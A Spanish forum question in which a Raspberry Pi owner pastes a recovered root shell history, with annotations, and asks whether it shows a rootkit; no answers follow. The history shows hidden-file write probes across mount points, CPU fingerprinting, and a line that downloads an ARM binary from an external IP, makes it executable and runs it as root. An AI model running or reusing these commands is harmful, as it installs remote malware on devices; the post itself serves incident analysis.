busybox rootkit?


Uso Buildroot para generar la zImage y compilar el kernel de mis Raspberry Pi, y BusyBox como conjunto de utilidades de línea de comandos de Linux.

Es la segunda vez que parece que tengo un rootkit: el historial del shell de root (`sh`) contiene los comandos que copio a continuación (los números 324–358 son índices del historial, no parte de los comandos). Resumiendo lo que muestra: se prueba en cada punto de montaje si se puede escribir (se crea, lee y borra un archivo oculto `.nippon`), se leen `/bin/echo` y `/proc/cpuinfo`, y por último se descarga con `wget` un binario ARM (`usb_bus.arm7`) desde una IP externa a `/`, se le dan permisos 777 y se ejecuta. Mi pregunta es: ¿se trata de un rootkit?

# Root shell history recovered from the device. The leading numbers (324-358) are
# history indices, not part of the commands. Every command is followed by
# "; /gweerwe323f", a path that does not exist: the resulting "not found" error
# presumably serves the remote session as an end-of-output marker (inference).
#
# NOTE(review): treat this host as compromised. Do not fetch or run the binary
# referenced below, and do not rely on output from the compromised host (ps,
# dmesg, ls) to decide whether something is still running.

# 324: BusyBox invoked with a bogus applet argument - presumably just checks that
#      /bin/busybox is present and prints its usage (inference).
# 325: list mounted filesystems; the entries below correspond to mount points.
324  /bin/busybox cp; /gweerwe323f
  325    mount ;/gweerwe323f
# 326-352: writable-filesystem probe. The hex escapes decode to "Grop", so each
#      line writes "Grop<mountpoint>" into a hidden file .nippon at that mount
#      point, reads it back, then deletes it. Where the write succeeds the cat
#      echoes the path back, telling the attacker which locations accept a file.
  326    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  327    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  328    echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon;   cat /var/tmp/.nippon;   rm -f /var/tmp/.nippon
  329    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  330    echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon;   cat /dev/.nippon;   rm -f /dev/.nippon
  331    echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon;   cat /sys/.nippon;   rm -f /sys/.nippon
  332    echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon;   cat /proc/.nippon;   rm -f /proc/.nippon
  333    echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon;   cat /dev/shm/.nippon;   rm -f /dev/shm/.nippon
  334    echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon;   cat /dev/pts/.nippon;   rm -f /dev/pts/.nippon
  335    echo -e '\x47\x72\x6f\x70/run' > /run/.nippon;   cat /run/.nippon;   rm -f /run/.nippon
  336    echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon;   cat /run/lock/.nippon;   rm -f /run/lock/.nippon
  337    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon;   cat /sys/fs/cgroup/.nippon;   rm -f /sys/fs/cgroup/.nippon
  338    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon;   cat /sys/fs/cgroup/systemd/.nippon;   rm -f /sys/fs/cgroup/systemd/.nippon
  339    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon;   cat /sys/fs/cgroup/cpuset/.nippon;   rm -f /sys/fs/cgroup/cpuset/.nippon
  340    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon;   cat /sys/fs/cgroup/cpu,cpuacct/.nippon;   rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
  341    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon;   cat /sys/fs/cgroup/blkio/.nippon;   rm -f /sys/fs/cgroup/blkio/.nippon
  342    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon;   cat /sys/fs/cgroup/devices/.nippon;   rm -f /sys/fs/cgroup/devices/.nippon
  343    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon;   cat /sys/fs/cgroup/freezer/.nippon;   rm -f /sys/fs/cgroup/freezer/.nippon
  344    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon;   cat /sys/fs/cgroup/net_cls/.nippon;   rm -f /sys/fs/cgroup/net_cls/.nippon
  345    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
  346    echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon;   cat /dev/mqueue/.nippon;   rm -f /dev/mqueue/.nippon
  347    echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon;   cat /sys/kernel/debug/.nippon;   rm -f /sys/kernel/debug/.nippon
  348    echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon;   cat /sys/kernel/config/.nippon;   rm -f /sys/kernel/config/.nippon
  349    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  350    echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon;   cat /boot/.nippon;   rm -f /boot/.nippon
  351    echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon;   cat /run/user/0/.nippon;   rm -f /run/user/0/.nippon
  352    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
# 353: the marker alone (empty command).
  353  /gweerwe323f
# 354-355: dump the echo binary and the CPU description - presumably used to
#      fingerprint the architecture before choosing a payload (inference; the
#      payload fetched next is an "arm7" build).
  354   cat /bin/echo ;/gweerwe323f
  355    cat /proc/cpuinfo;/gweerwe323f
# 356: the actual drop. From /, download usb_bus.arm7 from an external IP over
#      plain HTTP into a file named usb_bus, make it world-executable (777) and
#      run it. This is the line that matters: a remote binary was executed as root.
  356  cd /;   wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ;   chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
# 357-358: no trailing marker on these two - possibly typed by the owner when
#      inspecting the box afterwards rather than by the automated session (inference).
  357  ps aux
  358  dmesg
    
pregunta stefff 20.03.2017 - 10:07

0 respuestas
